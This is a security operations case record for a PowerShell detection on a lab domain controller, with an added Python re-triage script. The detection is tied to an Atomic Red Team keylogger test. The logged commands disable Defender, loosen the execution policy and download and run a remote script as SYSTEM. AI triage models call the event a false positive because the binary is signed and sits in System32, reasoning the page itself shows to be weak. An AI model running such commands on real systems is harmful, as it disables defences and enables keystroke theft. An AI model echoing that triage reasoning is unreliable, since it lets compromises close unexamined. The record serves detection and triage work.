Case #484
managed.Malicious PowerShell Commandlets - ProcessCreation
Analyst Verdict Classification
FP by analyst
AI Analysis
Detections (1)
Malicious PowerShell Commandlets - ProcessCreation
high
Rule: managed.Malicious PowerShell Commandlets - ProcessCreation
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% · Verdict: false positive
Event Data:
COMMAND_LINE:
"powershell.exe" & {&\""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"" -LogPath $env:TEMP\key.log}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
4472
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1
powershell.exe
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MITRE:
T1056.001
T1056.002
Analyst Declaration:
Raw Detection JSON
{
"author": "_ext-snapattack-bef4337c-2507-4428-bce6-8021ba80d7c4[bulk][segment]",
"cat": "Malicious PowerShell Commandlets - ProcessCreation",
"detect": {
"event": {
"COMMAND_LINE": "\"powershell.exe\" \u0026 {\u0026\\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\" -LogPath $env:TEMP\\key.log}",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 40960,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 4472,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "c154040b-ea96-4b5d-8921-766a72fc19cb",
"event_time": 1774364763537,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2000,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "e356c45953cc51ceee50fb0069c2a85c"
}
},
"detect_id": "f3d7c75e-4755-422d-b7a4-6f8069c2a85d",
"detect_mtd": {
"author": "Nasreddine Bencherchali (Nextron Systems)",
"description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
"falsepositives": [
"Unknown"
],
"level": "high",
"references": [
"https://adsecurity.org/?p=2921",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/calebstewart/CVE-2021-1675",
"https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
"https://github.com/HarmJ0y/DAMP",
"https://github.com/samratashok/nishang",
"https://github.com/DarkCoderSc/PowerRunAsSystem/",
"https://github.com/besimorhino/powercat",
"https://github.com/Kevin-Robertson/Powermad",
"https://github.com/adrecon/ADRecon",
"https://github.com/adrecon/AzureADRecon",
"https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1"
],
"snapattack_analytic_guid": "d48d9380-c5ae-495a-9274-c5fbdeb10e15",
"tags": [
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
]
},
"gen_time": 1774364765542,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364763\u0026selected=e356c45953cc51ceee50fb0069c2a85c",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "c154040b-ea96-4b5d-8921-766a72fc19cb",
"event_time": 1774364763537,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2000,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "e356c45953cc51ceee50fb0069c2a85c"
},
"rule_tags": [
"ext:ext-snapattack",
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "managed.Malicious PowerShell Commandlets - ProcessCreation",
"ts": 1774364765000
}
Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
Triage JSON
{
"confidence": 0.825,
"false_positive_reason": "Legitimate system process executing authorized security testing simulation from expected directory with proper digital signatures",
"investigation_questions": [
"What authorized administrative account executed this PowerShell command?",
"Is there a scheduled task or service that triggers these Atomic Red Team simulations?",
"Has the organization approved this security testing activity?"
],
"ioc_analysis": "The IOCs extracted show PowerShell executing Atomic Red Team attack simulations, but the process path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and hash match known legitimate Microsoft binaries. The parent process chain shows standard administrative execution patterns without evidence of lateral movement or persistence mechanisms.",
"iocs_extracted": [
"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1",
"powershell.exe",
"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c"
],
"mitre_techniques": [
"T1056.001",
"T1056.002"
],
"recommended_actions": [
"Close case as false positive (unanimous AI verdict)",
"Verify administrative privileges and authorized maintenance activities",
"Document the Atomic Red Team simulation execution in security logs",
"Monitor for subsequent unauthorized processes or lateral movement attempts"
],
"risk_score": 32,
"severity": "high",
"summary": "**Vote: UNANIMOUS (2/2 -\u003e FALSE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.85\nThis event is a false positive because the malicious PowerShell commandlets are being executed by a legitimate system process (powershell.exe) running from its expected location in System32. The user context (NT AUTHORITY\\SYSTEM) and signed binary status indicate this is likely an authorized administrative action rather than a compromise.\n\n**IOC Analysis:** The IOCs extracted show PowerShell executing Atomic Red Team attack simulations, but the process path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and hash match known legitimate Microsoft binaries. The parent process chain shows standard administrative execution patterns without evidence of lateral movement or persistence mechanisms.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.8\nThe detection is likely a false positive as the PowerShell process is legitimate and running from the expected System32 location, with a signed hash. The command line references Atomic Red Team, a legitimate red teaming tool, indicating it\u0027s probably part of a security testing exercise.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known Windows system binary in its expected directory, making it likely benign. The HASH is signed, and FILE_IS_SIGNED is 1, supporting legitimacy. However, the COMMAND_LINE involves Atomic Red Team scripts, which are designed for red teaming and may not be malicious in a controlled environment.",
"verdict": "false_positive",
"voting": {
"auto_action": "auto_close_fp",
"mode": "unanimous",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: false_positive (high, 85% confidence)",
"deepseek-r1:8b: false_positive (medium, 80% confidence)"
],
"votes": [
{
"confidence": 0.85,
"model": "qwen3.5:4b",
"verdict": "false_positive"
},
{
"confidence": 0.8,
"model": "deepseek-r1:8b",
"verdict": "false_positive"
}
],
"winning_count": 2,
"winning_verdict": "false_positive"
}
}
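The false-positive rationale in the triage JSON above rests on powershell.exe being signed, living in System32, and having a clean VirusTotal record for its hash. All three hold for every PowerShell launch on a Windows host, malicious ones included, so none of them separates this event from a compromise. What does separate it is the command-line chain recorded in the detection: the parent process (PID 3164) set the execution policy to Unrestricted, disabled Defender real-time monitoring with Set-MpPreference -DisableRealtimeMonitoring $true (ATT&CK T1562.001), and ran a remote script through IEX (IWR ...), all as NT AUTHORITY\SYSTEM on a sensor tagged domain-controller, before invoking the Atomic Red Team T1056.001 keystroke test. The script below is an added example, not FusionSOC, LimaCharlie or SnapAttack code. It re-runs the triage over the two command lines, user, path and host tag copied from the detection JSON, gives signature and path no weight, and returns the techniques and follow-up checks an analyst would want before closing. The indicator names, the regexes, the follow-up wording and the benign control command line are this example's own; the technique IDs are the standard ATT&CK mappings for those behaviours.

```python
"""Re-triage of the NEW_PROCESS event in this case from its command-line chain.
Added example; not FusionSOC, LimaCharlie or SnapAttack code."""
import re

# Process fields copied from the detection JSON on this page (subset).
EVENT = {
    "PROCESS_ID": 4472,
    "USER_NAME": r"NT AUTHORITY\SYSTEM",
    "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "FILE_IS_SIGNED": 1,
    "COMMAND_LINE": r'"powershell.exe" & {&\""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"" -LogPath $env:TEMP\key.log}',
    "PARENT": {
        "PROCESS_ID": 3164,
        "PARENT_PROCESS_ID": 2440,  # PID 2440 itself is not captured on the page
        "USER_NAME": r"NT AUTHORITY\SYSTEM",
        "COMMAND_LINE": (
            "PowerShell.exe Set-ExecutionPolicy Unrestricted ; "
            "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; "
            "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; "
            "Set-MpPreference -DisableRealtimeMonitoring $true ; "
            "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/"
            "master/install-atomicredteam.ps1' -UseBasicParsing) ; "
            "Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; "
            "Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 "
        ),
    },
}
HOST_TAGS = ["domain-controller"]  # from routing.tags on this page

# (indicator name, ATT&CK technique, pattern). Names and regexes are this
# example's own; the technique IDs are the standard ATT&CK mappings.
INDICATORS = [
    ("defender_realtime_disabled", "T1562.001",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("execution_policy_unrestricted", "T1059.001",
     re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)\b", re.I)),
    ("remote_script_cradle", "T1059.001",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*\b(IWR|Invoke-WebRequest|DownloadString)\b", re.I)),
    ("keylogger_script", "T1056.001", re.compile(r"Get-Keystrokes\.ps1", re.I)),
    ("atomic_red_team", "harness",
     re.compile(r"Invoke-AtomicTest\s+T\d{4}(\.\d{3})?|\\AtomicRedTeam\\", re.I)),
]
# Indicators an analyst must clear by hand; a test-harness label does not excuse them.
BLOCKING = {"defender_realtime_disabled", "remote_script_cradle"}


def scan(command_line):
    """Return [(name, technique)] for every indicator matching one command line."""
    return [(name, tech) for name, tech, rx in INDICATORS if rx.search(command_line)]


def process_chain(event):
    """Yield the alerting process, then each ancestor recorded in the event."""
    proc = event
    while proc is not None:
        yield proc
        proc = proc.get("PARENT")


def triage(event, host_tags):
    """Decide whether the event may be auto-closed, using behaviour only.

    FILE_IS_SIGNED and FILE_PATH are reported but carry no weight: a signed
    powershell.exe in System32 launches benign and malicious command lines alike.
    """
    chain = list(process_chain(event))
    hits = {p["PROCESS_ID"]: scan(p["COMMAND_LINE"]) for p in chain}
    names = {n for h in hits.values() for n, _ in h}
    techniques = sorted({t for h in hits.values() for _, t in h if t.startswith("T")})

    followups = []
    if "defender_realtime_disabled" in names:
        followups.append("confirm Defender real-time monitoring is back on for this host")
    if "atomic_red_team" in names:
        followups.append("match the Invoke-AtomicTest run to an approved test window or ticket")
    if "domain-controller" in host_tags and event["USER_NAME"].upper().endswith("SYSTEM"):
        top = chain[-1].get("PARENT_PROCESS_ID")
        followups.append(f"identify what launched the root PowerShell (parent PID {top}) as SYSTEM on a DC")

    return {
        "auto_close": not (names & BLOCKING),
        "signed_system32_launcher": bool(event["FILE_IS_SIGNED"]) and "System32" in event["FILE_PATH"],
        "techniques": techniques,
        "hits": hits,
        "followups": followups,
    }


if __name__ == "__main__":
    result = triage(EVENT, HOST_TAGS)
    print("auto_close:", result["auto_close"])  # False for this case
    print("techniques:", result["techniques"])
    for pid, found in result["hits"].items():
        print(pid, [n for n, _ in found])
    for item in result["followups"]:
        print("-", item)
```

Run as-is, the script refuses to auto-close the case because the parent command line trips two blocking indicators, and it reports T1562.001 and T1059.001 alongside the T1056.001 the page already lists. The signed_system32_launcher field is returned only so that a reviewer can see the fact was noted and still ignored; a constructed benign line such as powershell.exe -NoProfile -Command Get-Service matches no indicator and would auto-close.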
Response Actions
| Action | Target | Status | Result |
|---|---|---|---|
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Close case as false positive (unanimous AI verdict) | executed | General Activity Sweep: 0 events found |
| recommended | Verify administrative privileges and authorized maintenance activities | executed | General Activity Sweep: 0 events found |
| recommended | Document the Atomic Red Team simulation execution in security logs | executed | General Activity Sweep: 0 events found |
| recommended | Monitor for subsequent unauthorized processes or lateral movement attempts | executed | Lateral Movement Investigation: 50 events found |
Notes (5)
FusionSOC AI · 2026-03-24T15:31 (5 notes, all by FusionSOC AI; their text is excerpted in the Timeline)
Timeline
2026-03-24T16:01:25
analyst
Status changed: investigating → closed
2026-03-24T16:01:19
analyst
Analyst classified as False Positive (FP)
2026-03-24T15:31:21
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:31:21
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T15:31:21
FusionSOC AI
Note by FusionSOC AI: ## Lateral Movement Investigation **Action:** Monitor for subsequent unauthorized processes or lateral movement attemp...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Monitor for subsequent unauthorized processes or lateral movement attempts
2026-03-24T15:31:20
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:31:20
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Document the Atomic Red Team simulation execution in security logs **Sensor:** `...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Document the Atomic Red Team simulation execution in security logs
2026-03-24T15:31:20
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:31:20
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Verify administrative privileges and authorized maintenance activities **Sensor:...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Verify administrative privileges and authorized maintenance activities
2026-03-24T15:31:20
FusionSOC AI
Status changed: open → investigating
2026-03-24T15:31:20
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Close case as false positive (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-4...
2026-03-24T15:31:19
FusionSOC
Response action queued: recommended on Close case as false positive (unanimous AI verdict)
2026-03-24T15:31:19
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:31:19
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:31:19
FusionSOC AI
Detection f3d7c75e-4755-422d-b7a4-6f8069c2a85d triaged as false_positive (high severity, confidence: 82%)
2026-03-24T15:31:19
FusionSOC AI
Case created from detection: managed.Malicious PowerShell Commandlets - ProcessCreation